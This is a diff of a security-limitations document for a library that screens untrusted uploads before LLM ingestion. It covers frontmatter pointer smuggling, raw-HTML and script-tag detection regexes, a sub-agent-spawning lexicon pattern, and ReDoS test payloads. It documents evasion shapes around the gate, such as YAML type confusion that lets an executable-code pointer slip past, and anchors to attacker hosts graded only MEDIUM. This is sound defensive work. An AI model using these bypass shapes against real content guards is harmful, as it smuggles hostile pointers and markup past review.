|
||||||
|
| atferdsflytt | `git log --oneline v0.3.4..HEAD -- src/` | 11 commits |
|
||||||
|
| tagger | `git tag --list` | `v0.1.0` … `v0.7.0` (12) |
|
||||||
|
| løfte 1 | probe kjørt mot `git archive v0.3.1` scratch-tre og `HEAD`, samme skript | 4 ordinære markdown-former identiske; 4 rader løsnet |
|
||||||
|
| `.pdf` konsedert | `grep -n -i pdf README.md docs/PLAN.md` | `docs/PLAN.md:309` «conceded» |
|
||||||
|
| versjonsflater | `grep` over de ni flatene `docs/PLAN-v1.md:277` navngir | alle `0.7.0` |
|
||||||
|
| `[Unreleased]` | `sed -n '1,14p' CHANGELOG.md` | «Nothing yet» |
|
||||||
|
| integrasjonshistorikk | coord-arkivet, meldinger fra `llm-ingestion-okf` | 0.3.1-kjøring utsatt 07-26, aldri gjort; 0.3.4 målt 08-02; 0.3.4→0.6.1 målt 08-12 |
|
||||||
|
|
||||||
|
Probe-skriptet lå i en scratch-katalog og er ikke sporet — det er tolv linjer som
|
||||||
|
kjører `screen_output(text, PRESET_USER_UPLOAD)` over tolv faste input og skriver
|
||||||
|
`disposition | max_severity | reasons`. Reproduseres på et minutt mot et hvilket som
|
||||||
|
helst par tagger.
|
||||||
|
|
@ -40,38 +40,82 @@ items; this is the full list, each with the mechanism.
|
||||||
(an injection in a directory listing is caught) rather than path-rejecting the
|
(an injection in a directory listing is caught) rather than path-rejecting the
|
||||||
conformant bundle. A front-end materialising individual uploads keeps the opposite
|
conformant bundle. A front-end materialising individual uploads keeps the opposite
|
||||||
rule (`allow_reserved=False`): a reserved basename is a listing-shadow and refused.
|
rule (`allow_reserved=False`): a reserved basename is a listing-shadow and refused.
|
||||||
- **OKF frontmatter is a restricted grammar, and a one-key block-sequence item is
|
- **OKF frontmatter is a restricted grammar: the mapping class has exactly one
|
||||||
silently misparsed.** Gate T2 accepts a line-oriented subset deliberately — full
|
expressible form.** Gate T2 accepts a line-oriented subset deliberately — full YAML
|
||||||
YAML is a larger parse-attack surface than a write-time gate needs. Nested mappings
|
is a larger parse-attack surface than a write-time gate needs. Flow sequences
|
||||||
and flow collections (`[a, b]`, `{k: v}`) are *rejected outright*, which fails
|
(`[a, b]`) and nested mappings are *rejected outright*, which fails secure.
|
||||||
secure. **All three routes to a mapping fail, each on a different rule** — flow
|
**Three of the four routes to a mapping fail, each on a different rule** — block
|
||||||
(`{k: v}`) on the disallowed value-start indicator, block (`k:\n sub: v`) on the
|
(`k:\n sub: v`) on the nested-mapping check, dotted keys (`k.sub: v`) on the key
|
||||||
nested-mapping check, and dotted keys (`k.sub: v`) on the key pattern — so the
|
pattern, and the inline second colon (`k: sub: v`) on the mapping-construct check.
|
||||||
mapping *class* has no expressible form, rather than one form being preferable to
|
**The fourth, the flow form, is admitted only when every key is on an allowlist**
|
||||||
another. What survives is scalars and flat lists of strings. The defect is between
|
(`by`, `at`, `from`, `to`, `id`, `title`, `author`, `usage_count`,
|
||||||
those two outcomes: a block sequence whose items carry
|
`last_modified` — the keys SPEC.md @ `62432a09` §5.1/§5.2 names inside a mapping)
|
||||||
exactly **one** key parses "successfully" into the wrong type —
|
and every leaf is a plain scalar, itself run through the same value predicates as a
|
||||||
`sources:\n - uri: https://e.com/a` yields the **string** `'uri: https://e.com/a'`,
|
top-level scalar. Nested collections, quoted leaves, duplicate keys, an empty or
|
||||||
not a mapping, while the same list with two keys per item hard-rejects. A pointer
|
unclosed mapping, and `{a:b}` (which PyYAML 6.0.3 reads as the *key* `a:b`, not as
|
||||||
can therefore ride through in a key the `resource` allowlist never inspects
|
a scalar) all raise. The form is expressible, never trusted: the allowlist
|
||||||
(`attester:\n - resource: attesters/sql_equality.py` → WARN), whereas a top-level
|
inspects every key, which is the property that carried the security when the
|
||||||
`resource:` with a relative path correctly fails secure. The shape is not conformant
|
blanket refusal was doing the enforcing. **`resource` is deliberately off the
|
||||||
OKF, so a well-formed bundle will not produce it; a malformed or hostile one can, and
|
allowlist** although §5.1 names it inside a `sources` entry — it is a pointer
|
||||||
mode-b `import_bundle` writes the merged concept verbatim. Note the three block-list
|
rather than a label and the only key T3 exists for, so admitting it would let
|
||||||
shapes are *not* one case: flat scalars parse correctly, one key per item misparses
|
`executor: { resource: skills/run.md }` carry an executable-code pointer through a
|
||||||
silently, two keys per item hard-rejects.
|
key the https allowlist never inspects. What else survives is scalars and flat
|
||||||
|
lists of strings. **Two routes used to
|
||||||
|
degrade into a string instead of failing, and that defect is closed in `1.1.0`**:
|
||||||
|
a block-sequence item carrying exactly one key (`sources:\n - uri: https://e.com/a`
|
||||||
|
yielded the *string* `'uri: https://e.com/a'`) and the inline second colon
|
||||||
|
(`attester: resource: attesters/sql_equality.py`, which a real YAML parser refuses
|
||||||
|
outright). Both parsed "successfully" into the wrong *type*, and a pointer parked
|
||||||
|
in one rode through in a key the `resource` allowlist never inspects — mode-b
|
||||||
|
`import_bundle` returned WARN and wrote the merged concept verbatim. Both now
|
||||||
|
FAIL_SECURE at T2, before the allowlist is reached. **What closed is the type
|
||||||
|
confusion, not pointer-smuggling as a class:** T3 still inspects `resource` and
|
||||||
|
nothing else, so an honest *string* under another key rides through exactly as
|
||||||
|
before — `attester: attesters/sql_equality.py` is WARN, while the same path
|
||||||
|
under `resource:` FAIL_SECUREs. That is by design (the string is scanned like
|
||||||
|
any other frontmatter value under T1) and it is not what `1.1.0` changed.
|
||||||
|
**The boundary is where YAML
|
||||||
|
puts it**, ground-truthed against PyYAML 6.0.3: `": "` and a trailing `":"` open a
|
||||||
|
mapping and are refused; a colon carrying neither a space nor a line end
|
||||||
|
(`domain:security`, `https://e.com:8443/a`) does not and still parses, as does a
|
||||||
|
quoted scalar (`- "uri: x"`). Quotes are retained rather than stripped — a
|
||||||
|
divergence from YAML that remains, pinned in `tests/test_okf.py`.
|
||||||
- **T2 constrains import, not emission.** The frontmatter grammar runs on
|
- **T2 constrains import, not emission.** The frontmatter grammar runs on
|
||||||
`okf.import_bundle` (door C) only — `parse_frontmatter` is referenced nowhere in the
|
`okf.import_bundle` (door C) only — `parse_frontmatter` is referenced nowhere in the
|
||||||
door A/B persist path, so frontmatter that fails secure on import passes
|
door A/B persist path, so frontmatter that fails secure on import passes
|
||||||
`screen_output` unremarked. The grammar therefore bounds what a consumer can *receive*,
|
`screen_output` unremarked. The grammar therefore bounds what a consumer can *receive*,
|
||||||
never what a producer can *emit*. Verified identical on 0.2.0 and 0.3.1.
|
never what a producer can *emit*. Verified identical on 0.2.0 and 0.3.1.
|
||||||
- **Consequence: an OKF v0.2 concept cannot traverse the external-import path.** Both
|
- **An OKF v0.2 concept traverses the external-import path only if its `sources` are
|
||||||
of v0.2's backward-breaking migration targets are nested — `timestamp` → `generated.at`,
|
flat.** The wall used to be total: both of v0.2's backward-breaking migration targets
|
||||||
and body `# Citations` → a `sources` block list of mappings — so a conformant v0.2
|
are mappings — `timestamp` → `generated.at`, and body `# Citations` → a `sources`
|
||||||
concept fails secure at the frontmatter gate. This is the correct direction but it is
|
block list of mappings — and a consumer measured **0 of 53** upstream concepts
|
||||||
a compatibility wall, not a policy: v0.2 support requires a deliberate parse-safety
|
through the gate. The trust and provenance layer now passes in its spec form
|
||||||
decision about widening the grammar, and the dangling-or-substituted `executor`/
|
(`generated`, `verified` bare or listed, `usage_window`), so `generated.at` is no
|
||||||
`attester` pointer question only becomes live once that decision is made.
|
longer a wall. **`sources` still is**: SPEC.md writes each entry as a block mapping
|
||||||
|
under a block sequence (`- id: …\n resource: …`), and that carrier stays refused —
|
||||||
|
it is the shape whose one-key degradation smuggled a pointer before `1.1.0`, and
|
||||||
|
reopening it is a separate parse-safety decision, not a corollary of the flow form.
|
||||||
|
A concept whose `sources` are flat strings, or absent, imports. The
|
||||||
|
dangling-or-substituted `executor`/`attester` pointer question stays out of reach
|
||||||
|
for the same reason: both are mappings whose payload key is `resource`.
|
||||||
|
- **`tags` and `description` block the OKF import corpus universally, before the
|
||||||
|
trust layer is even reached.** The line-flat frontmatter parser has no
|
||||||
|
sequence-value type at all: `tags` is present in 53/53 upstream concept
|
||||||
|
documents — 9/53 as a flow sequence (`[a, b, c]`, rejected on the `[`
|
||||||
|
indicator) and 44/53 as a block sequence (`- a` / `- b`, rejected as
|
||||||
|
`"malformed frontmatter line"`) — 100% rejection regardless of form.
|
||||||
|
`description` is present in 53/53; 29/53 is a folded plain scalar continuing
|
||||||
|
on an indented second line, which the parser has no continuation-line model
|
||||||
|
for and misreads as `"nested mappings are not supported"` (the remaining
|
||||||
|
24/53 are single-line and parse fine). Measured directly on the upstream
|
||||||
|
reference bundles (`_okf-upstream/okf` @ `3fcbb9f`): removing `tags` alone
|
||||||
|
lets 4/53 documents pass; removing both `tags` and `description` together
|
||||||
|
(trust layer untouched) lets the same 4/53 pass, and all four then parse
|
||||||
|
`generated` correctly as a mapping. **Independent of both the mapping-form
|
||||||
|
gap and the `sources` block-form gap above:** closing either moves nothing
|
||||||
|
on this corpus, because `tags`/`description` reject before `sources` is ever
|
||||||
|
read. No sequence-value type or continuation-line model exists in the
|
||||||
|
stdlib-only parser to close this with.
|
||||||
- **A persist gate cannot cover execution risk.** OKF v0.2 introduces concepts whose
|
- **A persist gate cannot cover execution risk.** OKF v0.2 introduces concepts whose
|
||||||
purpose is to *name code to be run* (`runtime`, `executor.resource`,
|
purpose is to *name code to be run* (`runtime`, `executor.resource`,
|
||||||
`attester.resource`). This library answers "is this safe to **store**"; executable
|
`attester.resource`). This library answers "is this safe to **store**"; executable
|
||||||
|
|
@ -89,7 +133,13 @@ items; this is the full list, each with the mechanism.
|
||||||
`homoglyph:cyrillic-latin-mix` (MEDIUM) flags a Latin letter adjacent to a
|
`homoglyph:cyrillic-latin-mix` (MEDIUM) flags a Latin letter adjacent to a
|
||||||
Cyrillic look-alike, so genuine bilingual prose → MEDIUM → under untrusted →
|
Cyrillic look-alike, so genuine bilingual prose → MEDIUM → under untrusted →
|
||||||
QUARANTINE_REVIEW — a real false positive for an inbox that expects multilingual
|
QUARANTINE_REVIEW — a real false positive for an inbox that expects multilingual
|
||||||
content. A calibration fix is pending.
|
content. **Conceded for 1.x: no fix is promised.** The rule fires on codepoint
|
||||||
|
adjacency, which genuine bilingual prose produces as readily as a substitution
|
||||||
|
attack does. Narrowing it is a calibration question, not an API one, so a fix
|
||||||
|
may land in any 1.x release without breaking the contract — but none is
|
||||||
|
scheduled, and a caller that ingests multilingual prose should raise its
|
||||||
|
untrusted-tier threshold rather than wait for one. `SECURITY.md` lists this as a
|
||||||
|
documented boundary, not a vulnerability.
|
||||||
- **Insider in-place edits** by a trusted author are out of the untrusted-content
|
- **Insider in-place edits** by a trusted author are out of the untrusted-content
|
||||||
threat model.
|
threat model.
|
||||||
- **Text-only.** The core is `text -> findings`: it parses no files (no
|
- **Text-only.** The core is `text -> findings`: it parses no files (no
|
||||||
|
|
@ -264,11 +314,92 @@ items; this is the full list, each with the mechanism.
|
||||||
no test discriminated the two halves. They are now `is_active_tag` and
|
no test discriminated the two halves. They are now `is_active_tag` and
|
||||||
`is_defangable_tag`; the mutator kept the broader behaviour deliberately, pinned by
|
`is_defangable_tag`; the mutator kept the broader behaviour deliberately, pinned by
|
||||||
`tests/test_neutralize.py::test_mutator_still_defangs_what_the_scanner_now_lets_pass`.
|
`tests/test_neutralize.py::test_mutator_still_defangs_what_the_scanner_now_lets_pass`.
|
||||||
- **Raw-HTML findings count end tags.** `</a>` is active by name on its own, so a
|
- **The carrier split TIGHTENS the trusted tier when both carrier classes are present.**
|
||||||
corpus census that counts only opening tags understates what this detector reports
|
0.7.0 is sold as a loosening of the upload door, and on that door it is one. But
|
||||||
by roughly the ratio of closing to opening active tags (measured at 1.6× on one
|
splitting one class into two means a document carrying both an `<img src>` and an
|
||||||
corpus). Severity and finding count are unaffected — the class collapses to one
|
`<a href>` now emits *two* findings at MEDIUM+ where it emitted one, which trips
|
||||||
finding — but the `count` field is not a document count.
|
the compound overlay (`>=2 findings at MEDIUM+ -> escalated one tier`). Such a
|
||||||
|
document was WARN through 0.6.1 and is `quarantine_review` from 0.7.0 under
|
||||||
|
`PRESET_TRUSTED_SOURCE`. On the trusted preset nothing was hard-failed to begin
|
||||||
|
with, so this is the *only* direction the split can move it. Pinned by
|
||||||
|
`tests/test_wiring.py::test_split_tightens_the_trusted_tier_when_both_carriers_are_present`,
|
||||||
|
and `docs/rawhtml-census.py` now reports a `TIGHTENS` column against the
|
||||||
|
previously-shipped row on both trust tiers — "frees N" without "tightens M" is a
|
||||||
|
one-sided number. **Measured on all three populations, as shipped: 0 documents
|
||||||
|
tightened, on both trust tiers — reference-corpus (389), vendor-harvest (187),
|
||||||
|
generated-notes (552).**
|
||||||
|
**That zero is empirical, not structural, and the census shows exactly how thin
|
||||||
|
it is.** The split measured *alone* tightens **13** documents on the trusted tier
|
||||||
|
in vendor-harvest and **14** in generated-notes. Adding the no-URL narrowing takes
|
||||||
|
each of them back to 0: in these populations the document's second, HIGH-class
|
||||||
|
carrier was itself a tag naming no target, which the narrowing makes inert, so the
|
||||||
|
compound overlay never sees two findings. That is the census reporting a
|
||||||
|
cancellation, not this repo proving one — a population whose second carrier is a
|
||||||
|
real `<img src>` would still escalate, which is precisely the case
|
||||||
|
`test_split_tightens_the_trusted_tier_when_both_carriers_are_present` constructs
|
||||||
|
and pins. Read the zero as "not observed in any of the three populations, each
|
||||||
|
counted against its own denominator", never as "cannot happen".
|
||||||
|
- **The split also LOOSENS the upload door for a lone anchor — the direction it was
|
||||||
|
built for, and the one with a residual worth naming.** Measured as shipped:
|
||||||
|
`<a href="https://ext.example/p">t</a>` on its own emits one
|
||||||
|
`active:raw-html-link` at MEDIUM and disposes `quarantine_review` under
|
||||||
|
`PRESET_USER_UPLOAD` (`warn` under `PRESET_TRUSTED_SOURCE`); through 0.6.1 the
|
||||||
|
same document graded HIGH and `fail_secure`d. An `<img src>` to the same host is
|
||||||
|
untouched — `active:raw-html`, HIGH, `fail_secure`. So an anchor pointing at an
|
||||||
|
attacker-controlled host, arriving on an untrusted upload, is now a human decision
|
||||||
|
rather than a halt. The trade is deliberate and it removes an asymmetry that came
|
||||||
|
from syntax rather than affordance: following an anchor needs a click, exactly like
|
||||||
|
the markdown inline link that has graded MEDIUM since 0.3.1, so the same URL no
|
||||||
|
longer grades two different ways depending on which syntax carries it. It is
|
||||||
|
recorded here so 0.7.0's "frees N documents" is not read as free — what was freed
|
||||||
|
is the click-required class, and MEDIUM is a real grade drop on the door where
|
||||||
|
every finding is trust-escalated.
|
||||||
|
- **Raw-HTML findings no longer count end tags, and that moved a published field.**
|
||||||
|
Through 0.6.1 `</a>` was active by name on its own, so `count` ran roughly 1.6×
|
||||||
|
the opening-tag total (measured on one corpus) and a start/end pair counted 2.
|
||||||
|
0.7.0's no-URL narrowing makes an end tag inert — it names no target — so `count`
|
||||||
|
is now the opening-tag total. A consumer reading `count` will see it *drop* for
|
||||||
|
every document carrying `</a>`, on a field whose meaning did not change. The
|
||||||
|
finding count is unaffected: the class still collapses to one finding per class
|
||||||
|
per document, and `count` was never a document count.
|
||||||
|
- **Which tags the no-URL narrowing may render inert is a judgement about affordance,
|
||||||
|
and no test in this repo can derive it.** `_URL_AFFORDANCE_TAGS` holds the nine
|
||||||
|
names whose entire active affordance *is* the URL they name — `a`, `area`, `img`,
|
||||||
|
`video`, `audio`, `source`, `track`, `frame`, `frameset` — so carrying no URL
|
||||||
|
attribute they name no target and grade inert. Every other name in the active set
|
||||||
|
stays active with no attributes at all, because it does something a URL cannot
|
||||||
|
describe: `<script>` executes its body, `<style>` restyles, `<form>` submits. That
|
||||||
|
boundary is asserted, not measured. A name placed in the set whose affordance does
|
||||||
|
*not* reduce to its URL would go silently invisible, and no corpus can catch it,
|
||||||
|
because what it produces is an absence — the census counts findings, and a tag that
|
||||||
|
stopped firing contributes nothing to count. The fail-secure choice one branch
|
||||||
|
further in holds the other way and is worth reading beside it: a URL attribute whose
|
||||||
|
*value* this module cannot resolve keeps the tag active
|
||||||
|
(`active_content.py:320-324`), a branch the three corpora exercise **0** times.
|
||||||
|
That zero is empirical, so the predicate is written not to depend on it.
|
||||||
|
- **"Clean" means *graded, no finding raised* — never *cleaned bytes* — and at one
|
||||||
|
measured consumer's door, `warn` is the floor a document must clear to be
|
||||||
|
persisted rather than rejected.** The word is the library's own: a WARN
|
||||||
|
disposition with nothing to report carries the reason string `"clean: no
|
||||||
|
findings"` (`disposition.py:264`), and this project has repeated that word in the
|
||||||
|
tables it sends consumers. `screen_output` is a judgement API — its
|
||||||
|
`DispositionResult` carries `assessment` / `disposition` / `max_severity` /
|
||||||
|
`reasons`, with no sanitized-text field to read off it. Defanging lives in a
|
||||||
|
separate, deliberate call — `neutralize` — that a caller must invoke itself;
|
||||||
|
nothing upstream of that call transforms a byte. Measured against
|
||||||
|
`llm-ingestion-okf`'s `0.7.0` pin (2026-08-13): `inbox.py:139` sets its persist
|
||||||
|
floor to `warn`, and `inbox.py:323` persists anything carrying that disposition
|
||||||
|
into the bundle; its adapter (`guard_adapter.py:70`) forwards the original
|
||||||
|
extracted text, because nothing upstream ever handed it a transformed one. Four
|
||||||
|
raw-HTML carrier forms the 0.7.0 no-URL narrowing grades inert — an
|
||||||
|
`<a aria-label>` with no `href`, a bare `</a>`, `<Frame>`, `<video />` — verified
|
||||||
|
here (`screen_output(..., PRESET_USER_UPLOAD)`) to dispose `warn, clean: no
|
||||||
|
findings`; at that consumer's door the same four land written into the bundle,
|
||||||
|
carrier present verbatim. Neither library is wrong: `screen_output` never
|
||||||
|
promised transformed bytes, and the consumer never called `neutralize` for them.
|
||||||
|
The gap is in reading "clean" as "sanitized" rather than "no finding raised" — a
|
||||||
|
reading this project's own reports invite, and one that will mislead any caller
|
||||||
|
that persists on `warn` without calling `neutralize` itself.
|
||||||
- **Measured, document by document: a large minority of *benign* documents do not
|
- **Measured, document by document: a large minority of *benign* documents do not
|
||||||
persist unattended at the upload door.** The bullets above bound single rules on
|
persist unattended at the upload door.** The bullets above bound single rules on
|
||||||
single URLs. This one bounds the thing a consumer actually feels — how often an
|
single URLs. This one bounds the thing a consumer actually feels — how often an
|
||||||
|
|
@ -395,6 +526,23 @@ items; this is the full list, each with the mechanism.
|
||||||
HIGH under a low-trust preset is `fail_secure`. Report-only means the text is
|
HIGH under a low-trust preset is `fail_secure`. Report-only means the text is
|
||||||
never mutated — it does not mean the finding cannot block.
|
never mutated — it does not mean the finding cannot block.
|
||||||
|
|
||||||
|
- **The two labels a `<script>` tag raises come from patterns that do not match the
|
||||||
|
same strings.** `hybrid-xss:script-tag` is `<script\b[^><]*>`; `active:raw-html`
|
||||||
|
reads the same tag through `HTML_TAG_RE`, which consumes quoted attribute runs
|
||||||
|
atomically and so tolerates both `<` and `>` inside a quoted value. The lexicon's
|
||||||
|
`<` exclusion is not a modelling choice — it is the 0.3.3 ReDoS fix, and widening
|
||||||
|
it back to `[^>]` restores a quadratic arm (the row below carries the numbers).
|
||||||
|
Measured through both scanners: `<script src="a<b">` raises `active:raw-html` and
|
||||||
|
**no** XSS label, while `<script data-t="a>b">` raises both, the lexicon's match
|
||||||
|
simply ending at the quoted `>`. The disposition never moves — the raw-HTML branch
|
||||||
|
grades `<script>` HIGH with no attributes at all, so every shape here still
|
||||||
|
`fail_secure`s under `PRESET_USER_UPLOAD` — so what the divergence costs is the
|
||||||
|
*label*: a consumer filtering findings on the XSS id sees a subset of the script
|
||||||
|
tags the gate actually caught, and must not read that id as the gate's script-tag
|
||||||
|
census. The residual is practically dead in prose (a `<` inside a script tag's
|
||||||
|
quoted attribute region is not an ordinary shape) and is recorded because the
|
||||||
|
asymmetry is invisible from either scanner alone.
|
||||||
|
|
||||||
- **A connection-string password longer than 256 chars is not matched.** The
|
- **A connection-string password longer than 256 chars is not matched.** The
|
||||||
password run in the `*-connstr` egress patterns is bounded by
|
password run in the `*-connstr` egress patterns is bounded by
|
||||||
`MAX_CONNSTR_VALUE`; unbounded, it sits in front of a mandatory `@` and makes
|
`MAX_CONNSTR_VALUE`; unbounded, it sits in front of a mandatory `@` and makes
|
||||||
|
|
@ -411,24 +559,96 @@ items; this is the full list, each with the mechanism.
|
||||||
missed; on one preset it is held for review instead of halted.
|
missed; on one preset it is held for review instead of halted.
|
||||||
|
|
||||||
- **The ReDoS sweep has a measured sensitivity floor, not a clean bill of
|
- **The ReDoS sweep has a measured sensitivity floor, not a clean bill of
|
||||||
health.** All 150 compiled patterns across all eleven regex-bearing modules are
|
health.** All 152 compiled patterns across all eleven regex-bearing modules are
|
||||||
swept arm by arm — payloads synthesised per run from each pattern's own
|
swept arm by arm — payloads synthesised per run from each pattern's own
|
||||||
skeleton, so `[`, `[system]` and `[system](` are each probed separately rather
|
skeleton, so `[`, `[system]` and `[system](` are each probed separately rather
|
||||||
than relying on generic units, and each pattern is timed in the call mode the
|
than relying on generic units, and each pattern is timed in the call mode the
|
||||||
production code uses (`.sub()`/`.finditer()` visit every start position where
|
production code uses (`.sub()`/`.finditer()` visit every start position where
|
||||||
`.match()` cannot). Five patterns were quadratic across 0.3.3 and 0.3.4; all
|
`.match()` cannot). Five patterns were quadratic across 0.3.3 and 0.3.4; all
|
||||||
are fixed. But the sweep flags on *timing*, and it ignores measurements below a
|
are fixed. But the sweep flags on *timing*, and it ignores measurements below a
|
||||||
1.5 ms noise floor at N=8000. A quadratic arm sitting just under that floor
|
1.5 ms noise floor at N=8000 — process CPU time, re-derived on that instrument
|
||||||
would still cost **up to ~23 s** at the 1 000 000-char cap. So the claim this
|
(see the clock bullet below) rather than inherited from the wall clock the
|
||||||
sweep supports is "no arm worse than ~23 s at the cap", not "no quadratic arm
|
script used through 1.1.0. A quadratic arm sitting just under that floor would
|
||||||
remains". The method's blind spot is real and has now been demonstrated twice:
|
still cost **up to ~23 s** at the 1 000 000-char cap — that figure is arithmetic
|
||||||
a generic-payload pass found only one of 0.3.3's two patterns, and 0.3.2's
|
and not a measurement: a quadratic arm costs the square of the length ratio, and
|
||||||
|
1.5 ms × 125 × 125 is 23.4 s. So the claim this sweep supports is "no arm worse
|
||||||
|
than ~23 s at the cap", not "no quadratic arm remains". The method's blind spot
|
||||||
|
is real and has now been demonstrated twice: a generic-payload pass found only
|
||||||
|
one of 0.3.3's two patterns, and 0.3.2's
|
||||||
hand-written rows missed all three of 0.3.4's — including one on `sanitize`,
|
hand-written rows missed all three of 0.3.4's — including one on `sanitize`,
|
||||||
the first thing every ingested document touches. **Two arm shapes the unit-
|
the first thing every ingested document touches. **Two arm shapes the unit-
|
||||||
repetition payloads cannot express** are pinned by hand as a result: a tag that
|
repetition payloads cannot express** are pinned by hand as a result: a tag that
|
||||||
*closes* around a long body, and a run of plain characters carrying no anchor
|
*closes* around a long body, and a run of plain characters carrying no anchor
|
||||||
at all.
|
at all.
|
||||||
|
|
||||||
|
- **A green ReDoS row is evidence only if it has been seen red, and three rows in
|
||||||
|
this suite had never been.** The class is not a bad bound but a payload that cannot
|
||||||
|
reach the defect, and it leaves the row passing under the vulnerable form too. The
|
||||||
|
sub-agent row is the clearest case: the seed's unbounded lazy run costs per *prefix
|
||||||
|
match*, not per character — each start position where `spawn an agent that ` matches
|
||||||
|
drives its own O(N) scan to end-of-string looking for a capability keyword the
|
||||||
|
payload never supplies, so K prefix matches cost K×O(N), and the bounded
|
||||||
|
`(?:\S+\s+){0,12}?` port caps each scan at 12 tokens for K×O(1). A payload that
|
||||||
|
matches the prefix **once** and then pads pays a single lazy run and is linear
|
||||||
|
however long the pad is — two earlier shapes did exactly that, and the row sat
|
||||||
|
measured-dead at 1.2× until the payload was rebuilt as
|
||||||
|
`"spawn an agent that " * 3000`. (The nesting an older comment blamed is a red
|
||||||
|
herring: the inner `.*?` sits in an optional group, never a repeated one.) Measured
|
||||||
|
through `scan_lexicon` with the seed form patched back in — exponent **1.92** against
|
||||||
|
the shipped **1.01**, and **4.091s vs 0.190s** at 12 000 words, the seed breaking the
|
||||||
|
2.0s bound outright. Two siblings were dead for different reasons.
|
||||||
|
`lexicon-script-tag` had to be given its own N=200 000: at the shared N=100 000 the
|
||||||
|
vulnerable `[^>]` form measured only ~1.2–1.4s — under the 2.0s assert, so the row
|
||||||
|
was green under both forms and proved nothing. And
|
||||||
|
`test_gate_is_bounded_on_the_long_attribute_arm` was killed by **this repo's own
|
||||||
|
narrowing**: 0.7.0 put `<a>` in `_URL_AFFORDANCE_TAGS`, so its `<a ` + 100k + `>`
|
||||||
|
payload became inert and returned *before* the body ever reached the arm the row
|
||||||
|
exists to guard — separation 1.0×, 0.028s and no findings, against 12.475s for the
|
||||||
|
same payload carried by `<script `. The carrier was moved to `<script `, which is
|
||||||
|
active by name with no attributes, so no future URL-shaped narrowing can hollow it
|
||||||
|
out the same way. The general rule the three share: a payload must **deny** the
|
||||||
|
literal the vulnerable run sits in front of — a unit that supplies it matches
|
||||||
|
immediately and never exercises the run. **Nothing but hand measurement finds this
|
||||||
|
class.** The row is green either way, so
|
||||||
|
the suite cannot report its own blind spot, and every bound in it should be read as
|
||||||
|
"verified red under the vulnerable form" only where a comment says it was.
|
||||||
|
|
||||||
|
- **Every ReDoS bound in the suite is measured on process CPU time, and so is the
|
||||||
|
sweep that sets the published sensitivity floor.** `tests/redos_clock.py` is the one
|
||||||
|
clock all six test files import — `time.process_time()` — because a blowup is spent
|
||||||
|
cycles while a loaded machine steals wall clock without adding any. On
|
||||||
|
`time.monotonic()` two 0.7.0 rows failed at **2.24s / 3.66s** against a 2.0s bound
|
||||||
|
while two census processes held the CPU, and passed 3/3 on an idle machine: they had
|
||||||
|
been descheduled, not slowed. It lives in one module rather than five copies because
|
||||||
|
`test_output.py::test_the_redos_clock_ignores_time_this_process_did_not_spend` pins
|
||||||
|
one implementation, and four unpinned copies would be free to drift back to a wall
|
||||||
|
clock with nothing going red. **What the CPU clock gives up, stated: a scan that
|
||||||
|
BLOCKS forever burns no CPU, so it would hang the suite instead of failing it.**
|
||||||
|
That is acceptable only because every scanner it measures is pure regex over an
|
||||||
|
in-memory string, with no I/O and no locks — the last wall-clock holdout was retired
|
||||||
|
by auditing its path for anything that could block, not by assumption, and a wall
|
||||||
|
clock guarding a mode that cannot occur still charges the false-red premium
|
||||||
|
(measured there at 21.6s against a 10.0s bound, on a scan that spent 7.6s). **The sweep
|
||||||
|
now runs on the same clock, and closing that divergence bought no sensitivity.**
|
||||||
|
`docs/redos-sweep.py` imports `scan_seconds` instead of timing on
|
||||||
|
`time.monotonic()`, so the 1.5 ms floor at N=8000 and the "~23 s at the cap"
|
||||||
|
figure above are finally in the same currency as the bounds they justify. What
|
||||||
|
the move did *not* do is quiet the sweep, and the floor came back unchanged.
|
||||||
|
Measured over **twelve full runs of all 2585 arms**: the median ratio sits at
|
||||||
|
**1.95–2.03** in every size bucket above 50 µs — the whole surface measures
|
||||||
|
linear — while two-point excursions past the 2.6 flag threshold survive at every
|
||||||
|
magnitude, p99 ratio **2.9–3.3 even above 1 ms**. Flagged arms per run by floor:
|
||||||
|
**6.9 at 0.5 ms, 1.1 at 1.0 ms, 0.33 at 1.5 ms** (0–2 per run), so 1.5 ms is
|
||||||
|
still the knee. Descheduling was never what made this sweep noisy — a ratio
|
||||||
|
computed from two points is. Four distinct arms flagged at the shipped floor
|
||||||
|
across those twelve runs, **each in exactly one of them**, and nine of the twelve
|
||||||
|
runs were clean; eight consecutive runs of the shipped script immediately after a
|
||||||
|
full test run flagged 0–3 arms each, so machine load still moves the count even
|
||||||
|
on a CPU clock. Six flagged arms re-measured over six doublings give exponent
|
||||||
|
**0.97–1.09** and at most 1.2 s at the 1 000 000-char cap. **A single clean run
|
||||||
|
of this sweep is therefore not evidence either** — and neither is a single
|
||||||
|
flagged one.
|
||||||
|
|
||||||
- **Every surface now bounds its input, but not all of them the same way.**
|
- **Every surface now bounds its input, but not all of them the same way.**
|
||||||
`sanitize`, `fence` and `neutralize` raise `OversizeInputError` above
|
`sanitize`, `fence` and `neutralize` raise `OversizeInputError` above
|
||||||
`MAX_INPUT_CHARS` (1 000 000) rather than returning a partially transformed
|
`MAX_INPUT_CHARS` (1 000 000) rather than returning a partially transformed
|
||||||
|
|
@ -447,7 +667,13 @@ items; this is the full list, each with the mechanism.
|
||||||
an `oversize-input` finding (`active:oversize-input`, OWASP LLM10), and
|
an `oversize-input` finding (`active:oversize-input`, OWASP LLM10), and
|
||||||
`link_graph` records `(from_id, body_length)` in `LinkGraphResult.truncated`,
|
`link_graph` records `(from_id, body_length)` in `LinkGraphResult.truncated`,
|
||||||
which is what lets a caller tell "no links past here" apart from "no links
|
which is what lets a caller tell "no links past here" apart from "no links
|
||||||
*read* past here".
|
*read* past here". **The split itself is conceded for 1.x, not deferred.** It is
|
||||||
|
a surface property, not calibration: making the two halves agree later means
|
||||||
|
either raising where a caller gets a value today, or returning a truncated value
|
||||||
|
where one raises — a change to an exported symbol's contract in either
|
||||||
|
direction, therefore `2.0.0`. 1.x keeps the rule as stated: a surface that
|
||||||
|
returns *content* rejects at the cap, a surface that returns *findings*
|
||||||
|
truncates and says so.
|
||||||
|
|
||||||
## The six documented gaps (tracked by the coverage matrix)
|
## The six documented gaps (tracked by the coverage matrix)
|
||||||
|
|
||||||
|
|
@ -477,8 +703,30 @@ fails the test, forcing this doc to be updated:
|
||||||
capability, because the detector already decided it did not matter. Closing
|
capability, because the detector already decided it did not matter. Closing
|
||||||
this means giving detectors a channel that says what was seen separately from
|
this means giving detectors a channel that says what was seen separately from
|
||||||
how bad it is, which changes the grading and therefore fires the
|
how bad it is, which changes the grading and therefore fires the
|
||||||
consumer-notification promise in `docs/PLAN-v1.md`. Deferred deliberately, not
|
consumer-notification promise in `docs/PLAN-v1.md`. **Conceded for the whole of
|
||||||
